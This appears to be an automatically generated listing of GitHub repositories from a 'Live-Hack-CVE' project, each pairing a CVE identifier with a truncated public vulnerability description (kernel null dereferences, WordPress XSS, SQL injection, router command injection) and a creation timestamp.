**NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \#7, or PKCS \#12 are likely to be impacted. Applications using NSS for certificate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43527](https://github.com/Live-Hack-CVE/CVE-2021-43527) create time: 2022-12-27T14:12:15Z

**A vulnerability classified as critical was found in laravel-jqgrid. Affected by this vulnerability is the function getRows of the file src/Mgallegos/LaravelJqgrid/Repositories/EloquentRepositoryAbstract.php. The manipulation leads to sql injection. The name of the patch is fbc2d94f43d0dc772767a5bdb2681133036f935e. It i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4262](https://github.com/Live-Hack-CVE/CVE-2021-4262) create time: 2022-12-27T14:09:10Z

**A vulnerability was found in oils-js. It has been declared as critical. This vulnerability affects unknown code of the file core/Web.js. The manipulation leads to open redirect. The attack can be initiated remotely. The name of the patch is fad8fbae824a7d367dacb90d56cb02c5cb999d42. It is recommended to apply a patch to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4260](https://github.com/Live-Hack-CVE/CVE-2021-4260) create time: 2022-12-27T14:09:07Z

**** DISPUTED ** A vulnerability was found in whohas. It has been rated as problematic. This issue affects some unknown processing of the component Package Information Handler. The manipulation leads to cleartext transmission of sensitive information. The attack may be initiated remotely. The real existence of this vulne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4258](https://github.com/Live-Hack-CVE/CVE-2021-4258) create time: 2022-12-27T14:09:03Z

**A vulnerability classified as critical has been found in pacman-canvas up to 1.0.5. Affected is the function addHighscore of the file data/db-handler.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. Upgrading to version 1.0.6 is able to address this issue. The name of the patc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4261](https://github.com/Live-Hack-CVE/CVE-2021-4261) create time: 2022-12-27T14:08:53Z

**Altair HyperView Player versions 2021.1.0.27 and prior are vulnerable to improper validation of array index vulnerability during processing of H3D files. A DWORD value from a PoC file is extracted and used as an index to write to a buffer, leading to memory corruption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2951](https://github.com/Live-Hack-CVE/CVE-2022-2951) create time: 2022-12-27T14:08:49Z

**Cross Site Scripting (XSS) vulnerability in Feehi CMS thru 2.1.1 allows attackers to run arbitrary code via the user name field of the login page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36572](https://github.com/Live-Hack-CVE/CVE-2021-36572) create time: 2022-12-27T14:08:42Z

**Altair HyperView Player versions 2021.1.0.27 and prior are vulnerable to the use of uninitialized memory vulnerability during parsing of H3D files. A DWORD is extracted from an uninitialized buffer and, after sign extension, is used as an index into a stack variable to increment a counter leading to memory corruption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2950](https://github.com/Live-Hack-CVE/CVE-2022-2950) create time: 2022-12-27T14:07:44Z

**Cross site scripting vulnerability in 188Jianzhan 2.10 allows attackers to execute arbitrary code via the username parameter to /admin/reg.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39427](https://github.com/Live-Hack-CVE/CVE-2021-39427) create time: 2022-12-27T14:07:22Z

**Cross Site Scripting (XSS) vulnerability in Users.php in eyoucms 1.5.4 allows remote attackers to run arbitrary code and gain escalated privilege via the filename for edit_users_head_pic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39428](https://github.com/Live-Hack-CVE/CVE-2021-39428) create time: 2022-12-27T14:07:19Z

**Potential security vulnerabilities have been identified in an OMEN Gaming Hub SDK package which may allow escalation of privilege and/or denial of service. HP is releasing software updates to mitigate the potential vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3437](https://github.com/Live-Hack-CVE/CVE-2021-3437) create time: 2022-12-27T14:05:52Z

**A potential security vulnerability has been identified in OMEN Gaming Hub and in HP Command Center which may allow escalation of privilege and/or denial of service. HP has released software updates to mitigate the potential vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3919](https://github.com/Live-Hack-CVE/CVE-2021-3919) create time: 2022-12-27T14:05:30Z

**A potential security vulnerability has been identified in certain HP Workstation BIOS (UEFI firmware) which may allow arbitrary code execution. HP is releasing firmware mitigations for the potential vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3661](https://github.com/Live-Hack-CVE/CVE-2021-3661) create time: 2022-12-27T14:05:23Z

**By exploiting a time of check to time of use (TOCTOU) race condition during the Endpoint Security for Linux Threat Prevention and Firewall (ENSL TP/FW) installation process, a local user can perform a privilege escalation attack to obtain administrator privileges for the purpose of executing arbitrary code through inse CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23892](https://github.com/Live-Hack-CVE/CVE-2021-23892) create time: 2022-12-27T13:32:01Z

**A command injection vulnerability in MVISION EDR (MVEDR) prior to 3.4.0 allows an authenticated MVEDR administrator to trigger the EDR client to execute arbitrary commands through PowerShell using the EDR functionality 'execute reaction'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31838](https://github.com/Live-Hack-CVE/CVE-2021-31838) create time: 2022-12-27T13:31:57Z

**Improper privileges management vulnerability in McAfee Endpoint Security (ENS) Windows prior to 10.7.0 September 2021 Update allows local users to access files which they would otherwise not have access to via manipulating junction links to redirect McAfee folder operations to an unintended location. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31843](https://github.com/Live-Hack-CVE/CVE-2021-31843) create time: 2022-12-27T13:31:54Z

**A command Injection Vulnerability in McAfee Agent (MA) for Windows prior to 5.7.5 allows local users to inject arbitrary shell code into the file cleanup.exe. The malicious clean.exe file is placed into the relevant folder and executed by running the McAfee Agent deployment feature located in the System Tree. An attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31854](https://github.com/Live-Hack-CVE/CVE-2021-31854) create time: 2022-12-27T13:31:50Z

**An Improper Input Validation vulnerability in the Product Update feature of Bitdefender Endpoint Security Tools for Linux allows a man-in-the-middle attacker to abuse the DownloadFile function of the Product Update to achieve remote code execution. This issue affects: Bitdefender Endpoint Security Tools for Linux versi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3485](https://github.com/Live-Hack-CVE/CVE-2021-3485) create time: 2022-12-27T13:31:47Z

**Apache Subversion SVN authz protected copyfrom paths regression Subversion servers reveal 'copyfrom' paths that should be hidden according to configured path-based authorization (authz) rules. When a node has been copied from a protected location, users with access to the copy can see the 'copyfrom' path of the origina CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28544](https://github.com/Live-Hack-CVE/CVE-2021-28544) create time: 2022-12-27T13:31:26Z

**A path traversal vulnerability was identified in GitHub Enterprise Server that allowed remote code execution when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the instance. This vulnerability was fixed in versions 3.3.17, 3.4.1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46256](https://github.com/Live-Hack-CVE/CVE-2022-46256) create time: 2022-12-27T14:16:28Z

**An issue was discovered in the Linux kernel through 5.16-rc6. amvdec_set_canvases in drivers/staging/media/meson/vdec/vdec_helpers.c lacks check of the return value of kzalloc() and will cause the null pointer dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3112](https://github.com/Live-Hack-CVE/CVE-2022-3112) create time: 2022-12-27T14:16:11Z

**An improper limitation of a pathname to a restricted directory vulnerability was identified in GitHub Enterprise Server that enabled remote code execution. A check was added within Pages to ensure the working directory is clean before unpacking new content to prevent an arbitrary file overwrite bug. This vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46255](https://github.com/Live-Hack-CVE/CVE-2022-46255) create time: 2022-12-27T14:16:07Z

**An issue was discovered in the Linux kernel through 5.16-rc6. mtk_vcodec_fw_vpu_init in drivers/media/platform/mtk-vcodec/mtk_vcodec_fw_vpu.c lacks check of the return value of devm_kzalloc() and will cause the null pointer dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3113](https://github.com/Live-Hack-CVE/CVE-2022-3113) create time: 2022-12-27T14:16:04Z

**An issue was discovered in the Linux kernel through 5.16-rc6. imx_register_uart_clocks in drivers/clk/imx/clk.c lacks check of the return value of kcalloc() and will cause the null pointer dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3114](https://github.com/Live-Hack-CVE/CVE-2022-3114) create time: 2022-12-27T14:16:00Z

**An issue was discovered in the Linux kernel through 5.16-rc6. malidp_crtc_reset in drivers/gpu/drm/arm/malidp_crtc.c lacks check of the return value of kzalloc() and will cause the null pointer dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3115](https://github.com/Live-Hack-CVE/CVE-2022-3115) create time: 2022-12-27T14:15:56Z

**A buffer overflow was found in grub_font_construct_glyph(). A malicious crafted pf2 font can lead to an overflow when calculating the max_glyph_size value, allocating a smaller than needed buffer for the glyph, this further leads to a buffer overflow and a heap based out-of-bounds write. An attacker may use this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2601](https://github.com/Live-Hack-CVE/CVE-2022-2601) create time: 2022-12-27T14:15:52Z

**An issue was discovered in the Linux kernel through 5.16-rc6. lkdtm_ARRAY_BOUNDS in drivers/misc/lkdtm/bugs.c lacks check of the return value of kmalloc() and will cause the null pointer dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3104](https://github.com/Live-Hack-CVE/CVE-2022-3104) create time: 2022-12-27T14:15:48Z

**An issue was discovered in the Linux kernel through 5.16-rc6. uapi_finalize in drivers/infiniband/core/uverbs_uapi.c lacks check of kmalloc_array(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3105](https://github.com/Live-Hack-CVE/CVE-2022-3105) create time: 2022-12-27T14:15:45Z

**An issue was discovered in the Linux kernel through 5.16-rc6. netvsc_get_ethtool_stats in drivers/net/hyperv/netvsc_drv.c lacks check of the return value of kvmalloc_array() and will cause the null pointer dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3107](https://github.com/Live-Hack-CVE/CVE-2022-3107) create time: 2022-12-27T14:15:41Z

**An issue was discovered in the Linux kernel through 5.16-rc6. ef100_update_stats in drivers/net/ethernet/sfc/ef100_nic.c lacks check of the return value of kmalloc(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3106](https://github.com/Live-Hack-CVE/CVE-2022-3106) create time: 2022-12-27T14:15:37Z

**rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. Prior to version 1.4.4, there is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer due to an incomplete fix of CVE-2022-32209. Rails::Html::Sanitizer may allow an attacker to inject content if the a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23520](https://github.com/Live-Hack-CVE/CVE-2022-23520) create time: 2022-12-27T14:15:33Z

**An issue was discovered in the Linux kernel through 5.16-rc6. kfd_parse_subtype_iolink in drivers/gpu/drm/amd/amdkfd/kfd_crat.c lacks check of the return value of kmemdup(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3108](https://github.com/Live-Hack-CVE/CVE-2022-3108) create time: 2022-12-27T14:15:30Z

**An issue was discovered in the Linux kernel through 5.16-rc6. _rtw_init_xmit_priv in drivers/staging/r8188eu/core/rtw_xmit.c lacks check of the return value of rtw_alloc_hwxmits() and will cause the null pointer dereference. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3110](https://github.com/Live-Hack-CVE/CVE-2022-3110) create time: 2022-12-27T14:15:00Z

**Altair HyperView Player versions 2021.1.0.27 and prior perform operations on a memory buffer but can read from or write to a memory location outside of the intended boundary of the buffer. This hits initially as a read access violation, leading to a memory corruption situation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2947](https://github.com/Live-Hack-CVE/CVE-2022-2947) create time: 2022-12-27T14:14:57Z

**Altair HyperView Player versions 2021.1.0.27 and prior are vulnerable to the use of uninitialized memory vulnerability during parsing of H3D files. A DWORD is extracted from an uninitialized buffer and, after sign extension, is used as an index into a stack variable to increment a counter leading to memory corruption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2949](https://github.com/Live-Hack-CVE/CVE-2022-2949) create time: 2022-12-27T14:14:53Z

**rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. Prior to version 1.4.4, a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags in either o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23519](https://github.com/Live-Hack-CVE/CVE-2022-23519) create time: 2022-12-27T14:14:50Z

**vRealize Network Insight (vRNI) directory traversal vulnerability in vRNI REST API. A malicious actor with network access to the vRNI REST API can read arbitrary files from the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31703](https://github.com/Live-Hack-CVE/CVE-2022-31703) create time: 2022-12-27T14:14:46Z

**An issue was discovered in the fp_masterquiz (aka Master-Quiz) extension before 2.2.1, and 3.x before 3.5.1, for TYPO3. An attacker can continue the quiz of a different user. In doing so, the attacker can view that user's answers and modify those answers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47407](https://github.com/Live-Hack-CVE/CVE-2022-47407) create time: 2022-12-27T14:14:42Z

**The default console presented to users over telnet (when enabled) is restricted to a subset of commands. Commands issued at this console, however, appear to be fed directly into a system call or other similar function. This allows any authenticated user to execute arbitrary commands on the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47210](https://github.com/Live-Hack-CVE/CVE-2022-47210) create time: 2022-12-27T14:14:39Z

**A support user exists on the device and appears to be a backdoor for Technical Support staff. The default password for this account is “support” and cannot be changed by a user via any normally accessible means. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47209](https://github.com/Live-Hack-CVE/CVE-2022-47209) create time: 2022-12-27T14:14:35Z

**The “puhttpsniff” service, which runs by default, is susceptible to command injection due to improperly sanitized user input. An unauthenticated attacker on the same network segment as the router can execute arbitrary commands on the device without authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47208](https://github.com/Live-Hack-CVE/CVE-2022-47208) create time: 2022-12-27T14:14:32Z

**Out-of-bounds Read vulnerability in Delta Electronics DOPSoft.This issue affects DOPSoft: All Versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2966](https://github.com/Live-Hack-CVE/CVE-2022-2966) create time: 2022-12-27T14:14:29Z

**An issue was discovered in the fp_newsletter (aka Newsletter subscriber management) extension before 1.1.1, 1.2.0, 2.x before 2.1.2, 2.2.1 through 2.4.0, and 3.x before 3.2.6 for TYPO3. Data about subscribers may be obtained via unsubscribeAction operations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47411](https://github.com/Live-Hack-CVE/CVE-2022-47411) create time: 2022-12-27T14:14:25Z

**An issue was discovered in the fp_newsletter (aka Newsletter subscriber management) extension before 1.1.1, 1.2.0, 2.x before 2.1.2, 2.2.1 through 2.4.0, and 3.x before 3.2.6 for TYPO3. Data about subscribers may be obtained via createAction operations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47410](https://github.com/Live-Hack-CVE/CVE-2022-47410) create time: 2022-12-27T14:14:22Z

**An issue was discovered in the fp_newsletter (aka Newsletter subscriber management) extension before 1.1.1, 1.2.0, 2.x before 2.1.2, 2.2.1 through 2.4.0, and 3.x before 3.2.6 for TYPO3. Attackers can unsubscribe everyone via a series of modified subscription UIDs in deleteAction operations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47409](https://github.com/Live-Hack-CVE/CVE-2022-47409) create time: 2022-12-27T14:14:09Z

**An issue was discovered in the fp_newsletter (aka Newsletter subscriber management) extension before 1.1.1, 1.2.0, 2.x before 2.1.2, 2.2.1 through 2.4.0, and 3.x before 3.2.6 for TYPO3. There is a CAPTCHA bypass that can lead to subscribing many people. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47408](https://github.com/Live-Hack-CVE/CVE-2022-47408) create time: 2022-12-27T14:14:05Z

**The Permalink Manager Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including 2.2.20.3 due to improper output escaping on post/page/media titles. This makes it possible for attackers to inject arbitrary web scripts on the permalink-manager page if another plugin or theme CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4410](https://github.com/Live-Hack-CVE/CVE-2022-4410) create time: 2022-12-27T14:14:01Z

**Infinite loop in the F5 Ethernet Trailer protocol dissector in Wireshark 3.6.0 to 3.6.7 and 3.4.0 to 3.4.15 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3190](https://github.com/Live-Hack-CVE/CVE-2022-3190) create time: 2022-12-27T14:13:58Z

**Command injection is possible in the puppetlabs-apt module prior to version 9.0.0. A malicious actor is able to exploit this vulnerability only if they are able to provide unsanitized input to the module. This condition is rare in most deployments of Puppet and Puppet Enterprise. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3275](https://github.com/Live-Hack-CVE/CVE-2022-3275) create time: 2022-12-27T14:13:55Z

**Multiple vulnerabilities in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allow remote attackers to execute arbitrary code via a crafted applet that bypasses SecurityManager restrictions by (1) using com.sun.beans.finder.ClassFinder.findClass and leveraging an exception with the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-4681](https://github.com/Live-Hack-CVE/CVE-2012-4681) create time: 2022-12-27T12:42:43Z

**Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JavaFX 2.2.40 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-5843](https://github.com/Live-Hack-CVE/CVE-2013-5843) create time: 2022-12-27T12:42:40Z

**Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-5850. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-5842](https://github.com/Live-Hack-CVE/CVE-2013-5842) create time: 2022-12-27T12:41:56Z

**Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-5830](https://github.com/Live-Hack-CVE/CVE-2013-5830) create time: 2022-12-27T12:41:52Z

**Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2013-5809. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-5829](https://github.com/Live-Hack-CVE/CVE-2013-5829) create time: 2022-12-27T12:41:49Z

**Use-after-free vulnerability in the setInterval method in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to ex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0996](https://github.com/Live-Hack-CVE/CVE-2016-0996) create time: 2022-12-27T12:52:54Z

**In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP DirectoryIterator class accepts filenames with embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking paths that the code is allowed to access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11045](https://github.com/Live-Hack-CVE/CVE-2019-11045) create time: 2022-12-27T12:52:33Z

**In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP bcmath extension functions on some systems, including Windows, can be tricked into reading beyond the allocated space by supplying it with string containing characters that are identified as numeric by the OS but aren't ASCII numbers. This can read t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11046](https://github.com/Live-Hack-CVE/CVE-2019-11046) create time: 2022-12-27T12:52:03Z

**In PHP versions 7.3.x below 7.3.13 and 7.4.0 on Windows, when supplying custom headers to mail() function, due to mistake introduced in commit 78f4b4a2dcf92ddbccea1bb95f8390a18ac3342e, if the header is supplied in lowercase, this can result in double-freeing certain memory locations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11049](https://github.com/Live-Hack-CVE/CVE-2019-11049) create time: 2022-12-27T12:51:40Z

**When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11050](https://github.com/Live-Hack-CVE/CVE-2019-11050) create time: 2022-12-27T12:51:16Z

**In the Linux kernel before 5.1.6, there is a use-after-free in cpia2_exit() in drivers/media/usb/cpia2/cpia2_v4l.c that will cause denial of service, aka CID-dea37a972655. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19966](https://github.com/Live-Hack-CVE/CVE-2019-19966) create time: 2022-12-27T12:50:41Z

**WFS, Inc HeavenBurnsRed 2020.3.15.7141260 is vulnerable to Local Privilege Escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42046](https://github.com/Live-Hack-CVE/CVE-2022-42046) create time: 2022-12-27T12:45:06Z

**The multi-screen collaboration module has a path traversal vulnerability. Successful exploitation of this vulnerability may affect data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46856](https://github.com/Live-Hack-CVE/CVE-2021-46856) create time: 2022-12-27T12:52:16Z

**The Blue Admin WordPress plugin through 21.06.01 does not sanitise or escape its "Logo Title" setting before outputting in a page, leading to a Stored Cross-Site Scripting issue. Furthermore, the plugin does not have CSRF check in place when saving its settings, allowing the issue to be exploited via a CSRF attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24581](https://github.com/Live-Hack-CVE/CVE-2021-24581) create time: 2022-12-27T12:51:44Z

**Cachet is an open source status page system. Prior to version 2.5.1 authenticated users, regardless of their privileges (User or Admin), can trick Cachet and install the instance again, leading to arbitrary code execution on the server. This issue was addressed in version 2.5.1 by improving the middleware `ReadyForUse` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39173](https://github.com/Live-Hack-CVE/CVE-2021-39173) create time: 2022-12-27T12:51:37Z

**The Per page add to head WordPress plugin before 1.4.4 is lacking any CSRF check when saving its settings, which could allow attackers to make a logged in admin change them. Furthermore, as the plugin allows arbitrary HTML to be inserted in one of the setting (feature mentioned by the plugin), this could lead to Stored CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24586](https://github.com/Live-Hack-CVE/CVE-2021-24586) create time: 2022-12-27T12:51:30Z

**The Membership & Content Restriction – Paid Member Subscriptions WordPress plugin before 2.4.2 did not sanitise, validate or escape its order and orderby parameters before using them in SQL statement, leading to Authenticated SQL Injections in the Members and Payments pages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24728](https://github.com/Live-Hack-CVE/CVE-2021-24728) create time: 2022-12-27T12:51:23Z

**The Timetable and Event Schedule WordPress plugin before 2.4.2 does not have proper access control when updating a timeslot, allowing any user with the edit_posts capability (contributor+) to update arbitrary timeslot from any events. Furthermore, no CSRF check is in place as well, allowing such attack to be perform vi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24584](https://github.com/Live-Hack-CVE/CVE-2021-24584) create time: 2022-12-27T12:51:13Z

**The Donate With QRCode WordPress plugin before 1.4.5 does not sanitise or escape its QRCode Image setting, which result into a Stored Cross-Site Scripting (XSS). Furthermore, the plugin also does not have any CSRF and capability checks in place when saving such setting, allowing any authenticated user (as low as subscr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24618](https://github.com/Live-Hack-CVE/CVE-2021-24618) create time: 2022-12-27T12:51:10Z

**The OMGF WordPress plugin before 4.5.4 does not enforce path validation, authorisation and CSRF checks in the omgf_ajax_empty_dir AJAX action, which allows any authenticated users to delete arbitrary files or folders on the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24639](https://github.com/Live-Hack-CVE/CVE-2021-24639) create time: 2022-12-27T12:51:02Z

**In the server in SerNet verinice before 1.22.2, insecure Java deserialization allows remote authenticated attackers to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36981](https://github.com/Live-Hack-CVE/CVE-2021-36981) create time: 2022-12-27T12:50:38Z

**ETINET BACKBOX E4.09 and H4.09 mismanages password access control. When a user uses the User ID of the process running BBSV to login to the Backbox UI application, the system procedure (USER_AUTHENTICATE_) used for verifying the Password returns 0 (no error). The reason is that the user is not running the XYGate applic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33895](https://github.com/Live-Hack-CVE/CVE-2021-33895) create time: 2022-12-27T12:50:34Z

**In launchConfigNewNetworkFragment of NetworkProviderSettings.java, there is a possible way for the guest user to add a new WiFi network due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Prod CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20556](https://github.com/Live-Hack-CVE/CVE-2022-20556) create time: 2022-12-27T12:53:24Z

**In MessageQueueBase of MessageQueueBase.h, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-247092734 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20557](https://github.com/Live-Hack-CVE/CVE-2022-20557) create time: 2022-12-27T12:53:21Z

**A vulnerability, which was classified as problematic, was found in Opencaching Deutschland oc-server3. Affected is an unknown function of the file htdocs/lang/de/ocstyle/varset.inc.php. The manipulation of the argument varvalue leads to cross site scripting. It is possible to launch the attack remotely. The exploit has CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4514](https://github.com/Live-Hack-CVE/CVE-2022-4514) create time: 2022-12-27T12:53:18Z

**A vulnerability in the label-based access control of Grafana Labs Grafana Enterprise Metrics allows an attacker more access than intended. If an access policy which has label selector restrictions also has been granted access to all tenants in the system, the label selector restrictions will not be applied when using t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44643](https://github.com/Live-Hack-CVE/CVE-2022-44643) create time: 2022-12-27T12:53:14Z

**A vulnerability was found in WSO2 carbon-registry up to 4.8.11. It has been rated as problematic. Affected by this issue is some unknown functionality of the file components/registry/org.wso2.carbon.registry.search.ui/src/main/resources/web/search/advancedSearchForm-ajaxprocessor.jsp of the component Advanced Search. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4520](https://github.com/Live-Hack-CVE/CVE-2022-4520) create time: 2022-12-27T12:53:11Z

**In authToken2AidlVec of KeyMintUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-242702451 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20549](https://github.com/Live-Hack-CVE/CVE-2022-20549) create time: 2022-12-27T12:53:08Z

**In removeEventHubDevice of InputDevice.cpp, there is a possible OOB read due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-245770596 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20554](https://github.com/Live-Hack-CVE/CVE-2022-20554) create time: 2022-12-27T12:53:04Z

**In Multiple Locations, there is a possibility to launch arbitrary protected activities due to a confused deputy. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-242845514 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20550](https://github.com/Live-Hack-CVE/CVE-2022-20550) create time: 2022-12-27T12:53:01Z

**A vulnerability classified as problematic was found in CalendarXP up to 10.0.1. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 10.0.2 is able to address this issue. The name of the patch is e3715b2228ddefe00113296069969 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4522](https://github.com/Live-Hack-CVE/CVE-2022-4522) create time: 2022-12-27T12:52:57Z

**Product: AndroidVersions: Android kernelAndroid ID: A-212623833References: N/A CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20560](https://github.com/Live-Hack-CVE/CVE-2022-20560) create time: 2022-12-27T12:52:50Z

